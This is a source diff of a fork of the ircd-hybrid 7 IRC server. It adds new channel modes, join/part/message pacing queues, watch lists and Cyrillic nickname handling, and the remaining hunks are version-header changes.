diff -uNrd ircd-hybrid-7beta5/src/channel.c hybrid7-bg/src/channel.c
--- ircd-hybrid-7beta5/src/channel.c	Wed May 16 14:47:29 2001
+++ hybrid7-bg/src/channel.c	Thu Jul 11 15:02:37 2002
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: channel.c,v 7.216 2001/05/16 18:47:29 leeh Exp $
+ * $Id: channel.c,v 1.12 2002/07/11 19:02:37 Administrator Exp $
  */
 #include "tools.h"
 #include "channel.h"
@@ -82,6 +82,8 @@
 static int change_channel_membership(struct Channel *chptr,
 				     dlink_list *to_list, struct Client *who);
 
+static void clear_pace_queues(struct Channel *);
+
 /*
  * some buffers for rebuilding channel/nick lists with ,'s
  */
@@ -190,6 +192,9 @@
     case CHFL_INVEX:
       list = &chptr->invexlist;
       break;
+    case CHFL_SUBST:
+      list = &chptr->substlist;
+      break;
     default:
       sendto_realops_flags(FLAGS_ALL,
 			   "add_id() called with unknown ban type %d!", type);
@@ -259,6 +264,9 @@
     case CHFL_INVEX:
       list = &chptr->invexlist;
       break;
+    case CHFL_SUBST:
+      list = &chptr->substlist;
+      break;
     default:
       sendto_realops_flags(FLAGS_ALL,
 			   "del_id() called with unknown ban type %d!", type);
@@ -479,6 +487,19 @@
       }
     }
 
+  for (ptr = who->user->repeat.head; ptr; ptr = next_ptr) {
+	  struct Repeat *repeatptr = ptr->data;
+
+	  next_ptr = ptr->next;
+	  if (repeatptr->chptr == chptr) {
+
+		  MyFree(repeatptr->text); MyFree(repeatptr);
+		  dlinkDelete(ptr, &who->user->repeat);
+		  free_dlink_node(ptr);
+		  break;
+	  }
+  }
+
   who->user->joined--;
   
   if (IsVchan(chptr))
@@ -617,6 +638,22 @@
   if (chptr->mode.limit && chptr->users >= chptr->mode.limit)
     return (ERR_CHANNELISFULL);
 
+  if (RegNicksOnlyChannel(chptr) && !(source_p->svsflags & FLAGS_SVS_IDENT))
+    return (ERR_REGNICKSCHAN);
+
+  if (ConfigFileEntry.cyrillic && NoCyrNicksChannel(chptr))
+    {
+      char *p;
+      for (p = source_p->name; *p; p++)
+	{
+	  if ((unsigned char)*p >= 192)
+	    {
+	      return (ERR_NOCYRNICKCHAN);
+	      break;
+	    }
+	}
+    }  
+
   return 0;
 }
 
@@ -718,6 +755,9 @@
 
   if (chptr->mode.mode & MODE_MODERATED)
     return CAN_SEND_NO;
+
+  if (RegsMaySpeakChannel(chptr) && !(source_p->svsflags & FLAGS_SVS_IDENT))
+    return CAN_SEND_NOTREG;
   
   if (ConfigFileEntry.quiet_on_ban && MyClient(source_p) &&
      (is_banned(chptr, source_p) == CHFL_BAN))
@@ -761,6 +801,20 @@
     *mbuf++ = 'n';
   if (chptr->mode.mode & MODE_HIDEOPS)
     *mbuf++ = 'a';
+  if (chptr->mode.mode & MODE_NOCOLOR)
+    *mbuf++ = 'c';
+  if (chptr->mode.mode & MODE_REGCHAN)
+    *mbuf++ = 'r';
+  if (chptr->mode.mode & MODE_PACE)
+    *mbuf++ = 'x';
+  if (chptr->mode.mode & MODE_NOREPEAT)
+    *mbuf++ = 'z';
+  if (chptr->mode.mode & MODE_REGNICKS)
+    *mbuf++ = 'R';
+  if (chptr->mode.mode & MODE_REGSPEAK)
+    *mbuf++ = 'M';
+  if (chptr->mode.mode & MODE_CYRNICKS)
+    *mbuf++ = 'C';
   
   if (chptr->mode.limit)
   {
@@ -787,7 +841,7 @@
  * 		- char flag flagging type of mode i.e. 'b' 'e' etc.
  * 		- clear (remove all current modes, for ophiding, etc)
  * output	- NONE
- * side effects - sends +b/+e/+d/+I
+ * side effects - sends +b/+e/+w/+I
  *		  
  */
 static void send_mode_list(struct Client *client_p,
@@ -880,6 +934,9 @@
 
   if (IsCapable(client_p, CAP_IE))
     send_mode_list(client_p, chptr->chname, &chptr->invexlist, 'I', 0);
+
+  if (IsCapable(client_p, CAP_SW))
+    send_mode_list(client_p, chptr->chname, &chptr->substlist, 'w', 0);
 }
 
 /*
@@ -1064,6 +1121,8 @@
 #define SM_ERR_RESTRICTED       0x00000080      /* Restricted chanop */
 #define SM_ERR_RPL_I            0x00000100
 #define SM_ERR_RPL_D            0x00000200
+#define SM_ERR_NOTSERVICES      0x00000400      /* not from services client */
+#define SM_ERR_RPL_W			0x00000800
 
 /*
 ** Apply the mode changes passed in parv to chptr, sending any error
@@ -1084,7 +1143,8 @@
   int   whatt = MODE_ADD, the_mode = 0;
   int   done_s = NO, done_p = NO;
   int   done_i = NO, done_m = NO, done_n = NO, done_t = NO;
-  int   done_a = NO;
+  int   done_a = NO, done_c = NO, done_r = NO, done_R = NO;
+  int   done_M = NO, done_x = NO, done_C = NO, done_z = NO;
   
   struct Client *who;
   char  *curr = parv[0], c, *arg, plus = '+', *tmpc;
@@ -1102,6 +1162,9 @@
   char  modebuf_invex[MODEBUFLEN] = "";
   char  parabuf_invex[MODEBUFLEN] = "";
   
+  char  modebuf_subst[MODEBUFLEN] = "";
+  char  parabuf_subst[MODEBUFLEN] = "";
+  
   char  modebuf_hops[MODEBUFLEN] = "";
   char  parabuf_hops[MODEBUFLEN] = "";
   char  parabuf_hops_id[MODEBUFLEN] = "";
@@ -1118,6 +1181,9 @@
   char  *mbufw_invex = modebuf_invex;
   char  *pbufw_invex = parabuf_invex;
   
+  char  *mbufw_subst = modebuf_subst;
+  char  *pbufw_subst = parabuf_subst;
+  
   char *mbufw_hops = modebuf_hops;
   char *pbufw_hops = parabuf_hops;
   char *pbufw_hops_id = parabuf_hops_id;
@@ -1267,6 +1333,15 @@
           target_was_voice = is_voiced(chptr,who);
           target_was_op = target_was_chop | target_was_hop;
 
+		  if (find_z_conf((char *)who->user->server) && !IsOper(source_p)
+			  && (whatt == MODE_DEL) && (c == 'o') && target_was_chop) {
+
+			  if (MyClient(source_p))
+				sendto_one(source_p, form_str(ERR_CANTDEOPSERVICES),
+					me.name, source_p->name, who->name, chname);
+				break;
+		  }
+
           if (c == 'o')
 	    {
               /* convert attempts to -o a +h user into a -h
@@ -1418,6 +1493,7 @@
             {
               send_mode_list(who, chname, &chptr->exceptlist, 'e', 0);
               send_mode_list(who, chname, &chptr->invexlist, 'I', 0);
+              send_mode_list(who, chname, &chptr->substlist, 'w', 0);
             }
             else if (target_was_op && (whatt == MODE_DEL) &&
                      ((to_list != &chptr->chanops) &&
@@ -1425,6 +1501,7 @@
             {
               send_mode_list(who, chname, &chptr->exceptlist, 'e', 1);
               send_mode_list(who, chname, &chptr->invexlist, 'I', 1);
+              send_mode_list(who, chname, &chptr->substlist, 'w', 1);
             }
           }
 #endif
@@ -1571,6 +1648,78 @@
 
           break;
 
+        case 'w':
+          if (whatt == MODE_QUERY || parc-- <= 0)
+            {
+              if (!MyClient(source_p))
+                break;
+              if (errsent(SM_ERR_RPL_W, &errors_sent))
+                break;
+              /* don't allow a non chanop to see the subst word list
+               */
+              if(isok_c)
+                {
+                  for (ptr = chptr->substlist.head; ptr; ptr = ptr->next)
+		    {
+		      banptr = ptr->data;
+
+		      sendto_one(client_p, form_str(RPL_SUBSTLIST),
+				 me.name, client_p->name,
+				 chname,
+				 banptr->banstr,
+				 banptr->who,
+				 banptr->when);
+		    }
+
+                  sendto_one(source_p, form_str(RPL_ENDOFSUBSTLIST),
+                             me.name, source_p->name, 
+                             chname);
+                }
+		  else
+		{
+		   sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED),
+			     me.name, source_p->name, chname);
+		}
+              break;
+            }
+          arg = check_string(*parv++);
+
+          if (MyClient(source_p) && opcnt >= MAXMODEPARAMS)
+            break;
+
+          if (!isok_c)
+            {
+              if (!errsent(SM_ERR_NOOPS, &errors_sent) && MyClient(source_p))
+                sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED),
+                           me.name, source_p->name, 
+                           chname);
+              break;
+            }
+          
+          tmp = strlen(arg);
+          if (len + tmp + 2 >= MODEBUFLEN)
+            break;
+
+          if (!(((whatt & MODE_ADD) && !add_id(source_p, chptr, arg, CHFL_SUBST))
+		||
+                ((whatt & MODE_DEL) && !del_id(chptr, arg, CHFL_SUBST))))
+            break;
+
+          /* This stuff can go back in when all servers understand +w 
+           * with the pbufw_subst nonsense removed
+           */
+
+          len += tmp + 1;
+          opcnt++;
+
+          *mbufw_subst++ = plus;
+          *mbufw_subst++ = 'w';
+          strcpy(pbufw_subst, arg);
+          pbufw_subst += strlen(pbufw_subst);
+          *pbufw_subst++ = ' ';
+
+          break;
+
         case 'I':
           if (whatt == MODE_QUERY || parc-- <= 0)
             {
@@ -2183,6 +2332,281 @@
             }
           break;
 
+        case 'c' :
+          if (!isok_c)
+            {
+              if (MyClient(source_p) && !errsent(SM_ERR_NOOPS, &errors_sent))
+                sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED), me.name, 
+                           source_p->name, chname);
+              break;
+            }
+
+          if(MyClient(source_p))
+            {
+              if(done_c)
+                break;
+              else
+                done_c = YES;
+            }
+
+          if(whatt == MODE_ADD)
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode |= MODE_NOCOLOR;
+              *mbufw++ = '+';
+              *mbufw++ = 'c';
+              len += 2;
+            }
+          else
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode &= ~MODE_NOCOLOR;
+              *mbufw++ = '-';
+              *mbufw++ = 'c';
+              len += 2;
+            }
+          break;
+
+        case 'z' :
+          if (!isok_c)
+            {
+              if (MyClient(source_p) && !errsent(SM_ERR_NOOPS, &errors_sent))
+                sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED), me.name, 
+                           source_p->name, chname);
+              break;
+            }
+
+          if(MyClient(source_p))
+            {
+              if(done_z)
+                break;
+              else
+                done_z = YES;
+            }
+
+          if(whatt == MODE_ADD)
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode |= MODE_NOREPEAT;
+              *mbufw++ = '+';
+              *mbufw++ = 'z';
+              len += 2;
+            }
+          else
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode &= ~MODE_NOREPEAT;
+              *mbufw++ = '-';
+              *mbufw++ = 'z';
+              len += 2;
+            }
+          break;
+
+        case 'r':
+          if (!(IsServer(source_p) || find_z_conf((char *)source_p->user->server)))
+            {
+              if (MyClient(source_p) && !errsent(SM_ERR_NOTSERVICES, &errors_sent))
+		sendto_one(source_p,":%s NOTICE %s :*** NOTICE -- Chanmode +r can only be set by services",
+			   me.name, source_p->name);
+              break;
+	    }
+
+          if(MyClient(source_p))
+            {
+              if(done_r)
+                break;
+              else
+                done_r = YES;
+            }
+
+          if(whatt == MODE_ADD)
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode |= MODE_REGCHAN;
+              *mbufw++ = '+';
+              *mbufw++ = 'r';
+              len += 2;
+            }
+          else
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode &= ~MODE_REGCHAN;
+              *mbufw++ = '-';
+              *mbufw++ = 'r';
+              len += 2;
+            }
+          break;
+
+        case 'R' :
+          if (!isok_c)
+            {
+              if (MyClient(source_p) && !errsent(SM_ERR_NOOPS, &errors_sent))
+                sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED), me.name, 
+                           source_p->name, chname);
+              break;
+            }
+
+          if(MyClient(source_p))
+            {
+              if(done_R)
+                break;
+              else
+                done_R = YES;
+            }
+
+          if(whatt == MODE_ADD)
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode |= MODE_REGNICKS;
+              *mbufw++ = '+';
+              *mbufw++ = 'R';
+              len += 2;
+            }
+          else
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode &= ~MODE_REGNICKS;
+              *mbufw++ = '-';
+              *mbufw++ = 'R';
+              len += 2;
+            }
+          break;
+
+        case 'C' :
+          if (!isok_c)
+            {
+              if (MyClient(source_p) && !errsent(SM_ERR_NOOPS, &errors_sent))
+                sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED), me.name, 
+                           source_p->name, chname);
+              break;
+            }
+
+          if(MyClient(source_p))
+            {
+              if(done_C)
+                break;
+              else
+                done_C = YES;
+            }
+
+          if(whatt == MODE_ADD)
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode |= MODE_CYRNICKS;
+              *mbufw++ = '+';
+              *mbufw++ = 'C';
+              len += 2;
+            }
+          else
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode &= ~MODE_CYRNICKS;
+              *mbufw++ = '-';
+              *mbufw++ = 'C';
+              len += 2;
+            }
+          break;
+
+        case 'M' :
+          if (!isok_c)
+            {
+              if (MyClient(source_p) && !errsent(SM_ERR_NOOPS, &errors_sent))
+                sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED), me.name, 
+                           source_p->name, chname);
+              break;
+            }
+
+          if(MyClient(source_p))
+            {
+              if(done_M)
+                break;
+              else
+                done_M = YES;
+            }
+
+          if(whatt == MODE_ADD)
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode |= MODE_REGSPEAK;
+              *mbufw++ = '+';
+              *mbufw++ = 'M';
+              len += 2;
+            }
+          else
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode &= ~MODE_REGSPEAK;
+              *mbufw++ = '-';
+              *mbufw++ = 'M';
+              len += 2;
+            }
+          break;
+
+        case 'x' :
+          if (!isok_c)
+            {
+              if (MyClient(source_p) && !errsent(SM_ERR_NOOPS, &errors_sent))
+                sendto_one(source_p, form_str(ERR_CHANOPRIVSNEEDED), me.name, 
+                           source_p->name, chname);
+              break;
+            }
+
+          if(MyClient(source_p))
+            {
+              if(done_x)
+                break;
+              else
+                done_x = YES;
+            }
+
+          if(whatt == MODE_ADD)
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+              chptr->mode.mode |= MODE_PACE;
+              *mbufw++ = '+';
+              *mbufw++ = 'x';
+              len += 2;
+            }
+          else
+            {
+              if (len + 2 >= MODEBUFLEN)
+                break;
+
+	      clear_pace_queues(chptr);
+
+              chptr->mode.mode &= ~MODE_PACE;
+              *mbufw++ = '-';
+              *mbufw++ = 'x';
+              len += 2;
+            }
+          break;
+
         default:
           if (whatt == MODE_QUERY)
             break;
@@ -2203,13 +2627,14 @@
   */
 
   *mbufw = *mbuf2w = *pbufw = *pbuf2w = *mbufw_ex = *pbufw_ex = 
-  *mbufw_invex = *pbufw_invex = 
+  *mbufw_invex = *pbufw_invex = *mbufw_subst = *pbufw_subst =
   *mbufw_hops = *pbufw_hops = *pbufw_id = *pbufw_hops_id = *pbuf2w_id = '\0';
 
   collapse_signs(modebuf);
   collapse_signs(modebuf2);
   collapse_signs(modebuf_ex);
   collapse_signs(modebuf_invex);
+  collapse_signs(modebuf_subst);
   collapse_signs(modebuf_hops);
   /* modebuf_aops only ever holds one mode */
 
@@ -2367,6 +2792,40 @@
     }	
 
   /*
+   * mode +w, seen by ops only.
+   * Only send remotely to servers with SW
+   */
+  if(*modebuf_subst)
+    {
+      if(IsServer(source_p))
+	sendto_channel_local(ONLY_CHANOPS_HALFOPS,
+			     chptr,
+			     ":%s MODE %s %s %s",
+			     me.name,
+			     chname,
+			     modebuf_subst, parabuf_subst);
+      else
+        sendto_channel_local(ONLY_CHANOPS_HALFOPS,
+                             chptr,
+                             ":%s!%s@%s MODE %s %s %s",
+                             source_p->name,
+                             source_p->username,
+                             source_p->host,
+                             chname,
+                             modebuf_subst, parabuf_subst);
+
+      sendto_match_cap_servs_nocap(chptr, client_p, CAP_SW, CAP_UID, 
+				   ":%s MODE %s %s %s",
+				   source_p->name, chptr->chname,
+				   modebuf_subst, parabuf_subst);
+      sendto_match_vacap_servs(chptr, client_p, CAP_SW, CAP_UID, 0,
+			     ":%s MODE %s %s %s",
+			     HasID(source_p) ? source_p->user->id : source_p->name,
+			     chptr->chname,
+			     modebuf_subst, parabuf_subst);
+    }	
+
+  /*
    * mode +h, seen only by chanops/halfops on +a channels
    * Only send remotely to servers with HOPS
    */
@@ -2563,6 +3022,170 @@
 }
 
 /*
+ * add to channel pace queues, join or part
+ */
+void add_pace(struct Channel *chptr, struct Client *client_p, 
+	      char *chname, int join, int shownames)
+{
+  struct Pace *pace = MyMalloc(sizeof(struct Pace) + strlen(chname));
+
+  strcpy(pace->nick, client_p->name);
+  strcpy(pace->user, client_p->username);
+  strcpy(pace->host, client_p->host);
+  strcpy(pace->chan, chname);
+
+  pace->next = NULL;
+  pace->shownames = shownames;
+
+  if (join)
+    {
+      if (chptr->joinh)
+	chptr->joinh->next = pace;
+      chptr->joinh = pace;
+      if (!chptr->joint)
+	chptr->joint = pace;
+
+      chptr->joins++;
+    }
+  else
+    {
+      if (chptr->parth)
+	chptr->parth->next = pace;
+      chptr->parth = pace;
+      if (!chptr->partt)
+	chptr->partt = pace;
+
+      chptr->parts++;
+    }
+}
+
+/*
+ * add to channel PRIVMSG/NOTICE pace queue
+ */
+void add_pace_msg(struct Channel *chptr, 
+		  struct Client *client_p, struct Client *source_p,
+		  char *command, char *text)
+{
+  struct Pace *pace = MyMalloc(sizeof(struct Pace) + strlen(chptr->chname));
+
+  strcpy(pace->nick, command);
+  strcpy(pace->user, client_p? client_p->name : "can this be NULL?");
+  strcpy(pace->host, source_p->name);
+  strcpy(pace->chan, chptr->chname);
+
+  pace->next = NULL;
+  pace->text = MyMalloc(strlen(text) + 1);
+  strcpy(pace->text, text);
+
+  if (chptr->msgh)
+    chptr->msgh->next = pace;
+  chptr->msgh = pace;
+  if (!chptr->msgt)
+    chptr->msgt = pace;
+
+  chptr->msgs++;
+}
+
+/*
+ * this will flush out pace queues every PACE_CHANNELS_TIME secs
+ */
+void pace_channels(void *blah)
+{
+  struct Channel *chptr;
+
+  for (chptr = GlobalChannelList; chptr; chptr = chptr->nextch)
+    {
+      if (!PaceChannel(chptr))
+	continue;
+
+      if (chptr->joins)
+	{
+	  struct Pace *pace = chptr->joint;
+	  struct Client *client_p = find_client(pace->nick, NULL);
+
+	  sendto_channel_local(ALL_MEMBERS, chptr, ":%s!%s@%s JOIN :%s",
+			   pace->nick,
+			   pace->user,
+			   pace->host,
+			   pace->chan);
+	  if (client_p && pace->shownames)
+	    channel_member_names(client_p, chptr, pace->chan, 1);
+
+	  chptr->joint = pace->next;
+	  if (!pace->next)
+	    chptr->joinh = NULL;
+	  MyFree(pace);
+
+	  chptr->joins--;
+	}
+
+      if (chptr->parts)
+	{
+	  struct Pace *pace = chptr->partt;
+	  struct Client *client_p = find_client(pace->nick, NULL);
+
+	  sendto_channel_local(ALL_MEMBERS, chptr, ":%s!%s@%s PART :%s",
+			   pace->nick,
+			   pace->user,
+			   pace->host,
+			   pace->chan);
+	  if (client_p)
+	    sendto_one(client_p, ":%s!%s@%s PART :%s",
+			   pace->nick,
+			   pace->user,
+			   pace->host,
+			   pace->chan);
+
+	  chptr->partt = pace->next;
+	  if (!pace->next)
+	    chptr->parth = NULL;
+	  MyFree(pace);
+
+	  chptr->parts--;
+	}
+
+      if (chptr->msgs)
+	{
+	  struct Pace *pace = chptr->msgt;
+	  struct Client *client_p = find_client(pace->user, NULL);
+	  struct Client *source_p = find_client(pace->host, NULL);
+	  struct Channel *vchan = hash_find_channel(pace->chan, NULL);
+
+	  if (client_p && source_p && vchan)
+	    sendto_channel_butone(client_p, source_p, vchan,
+                                  pace->nick, ":%s", pace->text);
+
+	  chptr->msgt = pace->next;
+	  if (!pace->next)
+	    chptr->msgh = NULL;
+	  MyFree(pace->text);
+	  MyFree(pace);
+
+	  chptr->msgs--;
+	}
+
+      if (chptr->sends)
+	{
+	  struct Pace *pace = chptr->sendt;
+	  struct Channel *vchan = hash_find_channel(pace->chan, NULL);
+
+	  if (vchan)
+	    sendto_chanlists_local(vchan, pace->text, pace->shownames);
+
+	  chptr->sendt = pace->next;
+	  if (!pace->next)
+	    chptr->sendh = NULL;
+	  MyFree(pace->text);
+	  MyFree(pace);
+
+	  chptr->sends--;
+	}
+    }
+
+  eventAdd("pace_channels", pace_channels, NULL, PACE_CHANNELS_TIME, 0);
+}
+
+/*
  * cleanup_channels
  *
  * inputs	- not used
@@ -2682,13 +3305,14 @@
   free_channel_list(&chptr->banlist);
   free_channel_list(&chptr->exceptlist);
   free_channel_list(&chptr->invexlist);
+  free_channel_list(&chptr->substlist);
 
   /* This should be redundant at this point but JIC */
   chptr->banlist.head = chptr->exceptlist.head =
-    chptr->invexlist.head = NULL;
+    chptr->invexlist.head = chptr->substlist.head = NULL;
 
   chptr->banlist.tail = chptr->exceptlist.tail =
-    chptr->invexlist.tail = NULL;
+    chptr->invexlist.tail = chptr->substlist.tail = NULL;
 
   if (chptr->prevch)
     chptr->prevch->nextch = chptr->nextch;
@@ -2699,9 +3323,50 @@
 
   MyFree(chptr->topic_info);
 
+  clear_pace_queues(chptr);
+
   del_from_channel_hash_table(chptr->chname, chptr);
   MyFree((char*) chptr);
   Count.chan--;
+}
+
+void clear_pace_queues(struct Channel *chptr)
+{
+  struct Pace *pace;
+
+  while (chptr->joint)
+    {
+      pace = chptr->joint;
+      chptr->joint = pace->next;
+      MyFree(pace);
+    }
+  chptr->joinh = NULL; chptr->joins = 0;
+
+  while (chptr->partt)
+    {
+      pace = chptr->partt;
+      chptr->partt = pace->next;
+      MyFree(pace);
+    }
+  chptr->parth = NULL; chptr->parts = 0;
+
+  while (chptr->msgt)
+    {
+      pace = chptr->msgt;
+      chptr->msgt = pace->next;
+      MyFree(pace->text);
+      MyFree(pace);
+    }
+  chptr->msgh = NULL; chptr->msgs = 0;
+  
+  while (chptr->sendt)
+    {
+      pace = chptr->sendt;
+      chptr->sendt = pace->next;
+      MyFree(pace->text);
+      MyFree(pace);
+    }
+  chptr->sendh = NULL; chptr->sends = 0;
 }
 
 /*
diff -uNrd ircd-hybrid-7beta5/src/class.c hybrid7-bg/src/class.c
--- ircd-hybrid-7beta5/src/class.c	Tue Apr 17 17:21:23 2001
+++ hybrid7-bg/src/class.c	Tue Jun  5 12:35:46 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: class.c,v 7.28 2001/04/17 21:21:23 toot Exp $
+ *   $Id: class.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "tools.h"
 #include "class.h"
diff -uNrd ircd-hybrid-7beta5/src/client.c hybrid7-bg/src/client.c
--- ircd-hybrid-7beta5/src/client.c	Mon May 14 03:31:33 2001
+++ hybrid7-bg/src/client.c	Wed Jul 24 13:38:27 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: client.c,v 7.168 2001/05/14 07:31:33 a1kmm Exp $
+ *  $Id: client.c,v 1.8 2002/07/24 17:38:27 Administrator Exp $
  */
 #include "tools.h"
 #include "client.h"
@@ -504,7 +504,8 @@
   if (IsServer(client_p))
     {
       --Count.server;
-      sendto_realops_flags(FLAGS_EXTERNAL, "Server %s split from %s",
+      if (!IsRelay(client_p))
+	sendto_realops_flags(FLAGS_EXTERNAL, "Server %s split from %s",
                            client_p->name, client_p->servptr->name);
     }
   else if (IsClient(client_p))
@@ -1056,6 +1057,9 @@
           /* Clean up allow lists */
           del_all_accepts(source_p);
 
+		  /* poof goes their watchlist! */
+		  hash_del_watch_list(source_p);
+
 	  if (HasID(source_p))
 	    del_from_id_hash_table(source_p->user->id, source_p);
   
@@ -1068,6 +1072,10 @@
    */
   del_from_client_hash_table(source_p->name, source_p);
 
+  /* remove user from watchlists */
+  if(IsRegistered(source_p))
+	hash_check_watch(source_p, RPL_LOGOFF);
+
   /* remove from global client list */
   remove_client_from_list(source_p);
 
@@ -1803,14 +1811,20 @@
 
   /* Finally, add to hash */
   del_from_client_hash_table(source_p->name, source_p);
+
+  hash_check_watch(source_p, RPL_LOGOFF);
+
   strcpy(source_p->name, nick);
   add_to_client_hash_table(nick, source_p);
 
+  hash_check_watch(source_p, RPL_LOGON);
+
   /* Make sure everyone that has this client on its accept list
    * loses that reference. 
    */
 
   del_all_accepts(source_p);
+  source_p->svsflags &= ~FLAGS_SVS_IDENT;
 
   /*
    * .. and update the new nick in the fd note.
@@ -1844,6 +1858,8 @@
 {
   char* ch   = nick;
   char* endp = ch + NICKLEN;
+  int cyr = 0, lat = 0;
+ 
   assert(0 != nick);
 
   if (*nick == '-' || IsDigit(*nick)) /* first character in [0..9-] */
@@ -1851,11 +1867,64 @@
   
   for ( ; ch < endp && *ch; ++ch)
     {
-      if (!IsNickChar(*ch))
-	break;
+      if (ConfigFileEntry.cyrillic && ((unsigned char)*ch >= 192))
+	{
+	  if (lat)
+	    break;      /* do not allow mixed lat/cyr nicks */
+
+	  cyr = 1;
+	  continue;
+	}
+      if (IsNickChar(*ch))
+	{
+	  if (cyr && isalpha(*ch))
+	    break;
+
+	  if (isalpha(*ch))
+	    lat = 1;
+	  continue;
+	}
+
+      break;            /* invalid nick character */
     }
   *ch = '\0';
 
   return (ch - nick);
 }
 
+static char cyr2lat[] = {
+  'A', 'B', 'V', 'G', 'D', 'E', 'Z', 'Z', 'I', 'J', 'K', 'L', 'M', 'N',
+  'O', 'P', 'R', 'S', 'T', 'U', 'F', 'H', 'C', '4', '6', '@', 'Y', '#',
+  'J', '#', 'U', 'Q',
+  'a', 'b', 'v', 'g', 'd', 'e', 'z', 'z', 'i', 'j', 'k', 'l', 'm', 'n',
+  'o', 'p', 'r', 's', 't', 'u', 'f', 'h', 'c', '4', '6', '@', 'y', '#',
+  'j', '#', 'u', 'q'
+};
+
+/*
+ * this will transpose cyrillic characters 
+ * into their latin phonetic counterparts
+ *
+ *                                -demond
+ */
+char *translate(struct Client *client_p, char *buf)
+{
+  unsigned char *p = buf;
+  int i, offset;
+
+  if (IsSetTransWin(client_p))
+    offset = 192;
+  else if (IsSetTransISO(client_p))
+    offset = 176;
+  else
+    return buf;
+
+  while (*p)
+    {
+      if ((*p >= offset) && (*p < offset + 2*32))
+	*p = cyr2lat[*p - offset];
+      ++p;
+    }
+
+  return buf;
+}
diff -uNrd ircd-hybrid-7beta5/src/conf/CVS/Entries hybrid7-bg/src/conf/CVS/Entries
--- ircd-hybrid-7beta5/src/conf/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/conf/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+D
diff -uNrd ircd-hybrid-7beta5/src/conf/CVS/Repository hybrid7-bg/src/conf/CVS/Repository
--- ircd-hybrid-7beta5/src/conf/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/conf/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/src/conf
diff -uNrd ircd-hybrid-7beta5/src/conf/CVS/Root hybrid7-bg/src/conf/CVS/Root
--- ircd-hybrid-7beta5/src/conf/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/conf/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/src/dline_conf.c hybrid7-bg/src/dline_conf.c
--- ircd-hybrid-7beta5/src/dline_conf.c	Mon Apr  9 11:11:09 2001
+++ hybrid7-bg/src/dline_conf.c	Tue Jun  5 12:35:46 2001
@@ -2,7 +2,7 @@
  * A slightly nicer version of dline_conf.c
  * Written by Aaron Sethman <androsyn@ratbox.org>
  *
- * $Id: dline_conf.c,v 7.32 2001/04/09 15:11:09 davidt Exp $
+ * $Id: dline_conf.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include "config.h"
diff -uNrd ircd-hybrid-7beta5/src/event.c hybrid7-bg/src/event.c
--- ircd-hybrid-7beta5/src/event.c	Thu Apr 19 18:29:42 2001
+++ hybrid7-bg/src/event.c	Tue Jun  5 12:35:46 2001
@@ -3,7 +3,7 @@
  *
  * This code was borrowed from the squid web cache by Adrian Chadd.
  *
- * $Id: event.c,v 7.16 2001/04/19 22:29:42 a1kmm Exp $
+ * $Id: event.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  *
  * Original header follows:
  *
diff -uNrd ircd-hybrid-7beta5/src/fdlist.c hybrid7-bg/src/fdlist.c
--- ircd-hybrid-7beta5/src/fdlist.c	Mon Mar  5 21:22:57 2001
+++ hybrid7-bg/src/fdlist.c	Tue Jun  5 12:35:46 2001
@@ -3,7 +3,7 @@
  * fdlist.c   maintain lists of file descriptors
  *
  *
- * $Id: fdlist.c,v 7.23 2001/03/06 02:22:57 androsyn Exp $
+ * $Id: fdlist.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "fdlist.h"
 #include "client.h"  /* struct Client */
diff -uNrd ircd-hybrid-7beta5/src/fileio.c hybrid7-bg/src/fileio.c
--- ircd-hybrid-7beta5/src/fileio.c	Thu Jan 18 04:07:37 2001
+++ hybrid7-bg/src/fileio.c	Tue Jun  5 12:35:46 2001
@@ -4,7 +4,7 @@
  * Copyright (C) 1990 Jarkko Oikarinen and
  *                    University of Oulu, Co Center
  *
- * $Id: fileio.c,v 7.16 2001/01/18 09:07:37 ejb Exp $
+ * $Id: fileio.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  *
  * This program is free software; you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
